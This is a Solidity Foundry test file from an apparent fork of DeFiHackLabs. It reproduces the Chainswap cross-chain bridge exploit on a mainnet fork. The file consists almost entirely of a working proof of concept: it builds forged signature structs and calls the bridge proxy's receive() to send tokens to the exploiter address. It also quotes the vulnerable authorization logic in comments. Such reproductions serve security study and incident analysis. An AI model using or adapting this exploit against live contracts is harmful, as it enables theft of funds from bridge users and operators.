forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Chainswap_exp1.sol
79 lines (70 loc) · 3.36 KB
/
Chainswap_exp1.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.6.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
struct Signature {
address signatory;
uint8 v;
bytes32 r;
bytes32 s;
}
// interface IChainswap {
// function receive(uint256 fromChainId, address to, uint256 nonce, uint256 volume, Signature[] memory signatures) virtual external payable;
// }
contract ContractTest is Test {
address exploiter = 0x941a9E3B91E1cc015702B897C512D265fAE88A9c;
address proxy = 0x7fe68FC06e1A870DcbeE0acAe8720396DC12FC86;
address impl = 0x373CE6Da1AEB73A9bcA412F2D3b7eD07Af3AD490;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet", 12_751_487); // fork mainnet at block 13125070
// https://etherscan.io/tx/0x5c5688a9f981a07ed509481352f12f22a4bd7cea46a932c6d6bbe67cca3c54be
}
function testExploit() public {
Signature[] memory sigs = new Signature[](4);
sigs[0] = Signature({
signatory: 0x8C46b006D1c01739E8f71119AdB8c6084F739359,
v: 27,
r: 0x7b9ce0f78253f7dcf8bf6a2d7a4c38a151eba15eefe6b355a67a373653192765,
s: 0x0a4b99389149cc4f7f6051299145c113f5aa50dccf19f748516c4c977f475d6c
});
sigs[1] = Signature({
signatory: 0x4F559d3c39C3F3d408aFBFB27C44B94badA8dEd5,
v: 27,
r: 0x692e284a3efd148d6dd23b44055740fac7154a482fbeff7f2cc4acf4002fa62d,
s: 0x1134236483ad360a775e6c22100f83ba5091115323417205cfbd4ae898cd0bc2
});
sigs[2] = Signature({
signatory: 0x6EA6D36d73cF8ccD629Fbc5704eE356144A89A06,
v: 28,
r: 0x9ca27b8ec05746c43cd67e0099015ea9b88bdf34e8acfd6ace9dd63b8a320433,
s: 0x1d4aaa253afc6c5d5f893d4a572de830538aeef3b65cb6ff3bb6fec738a899d0
});
proxy.call(
abi.encodeWithSignature(
"receive(uint256,address,uint256,uint256, Signature[])",
1,
exploiter,
1,
19_392_277_118_050_930_170_440,
sigs
)
);
// function receive(uint256 fromChainId, address to, uint256 nonce, uint256 volume, Signature[] memory signatures) virtual external payable {
// _chargeFee();
// require(received[fromChainId][to][nonce] == 0, 'withdrawn already');
// uint N = signatures.length;
// require(N >= Factory(factory).getConfig(_minSignatures_), 'too few signatures');
// for(uint i=0; i<N; i++) {
// for(uint j=0; j<i; j++)
// require(signatures[i].signatory != signatures[j].signatory, 'repetitive signatory');
// bytes32 structHash = keccak256(abi.encode(RECEIVE_TYPEHASH, fromChainId, to, nonce, volume, signatures[i].signatory));
// bytes32 digest = keccak256(abi.encodePacked("\x19\x01", _DOMAIN_SEPARATOR, structHash));
// address signatory = ecrecover(digest, signatures[i].v, signatures[i].r, signatures[i].s);
// require(signatory != address(0), "invalid signature");
// **require(signatory == signatures[i].signatory, "unauthorized");**
// _decreaseAuthQuota(signatures[i].signatory, volume);
}
receive() external payable {}
}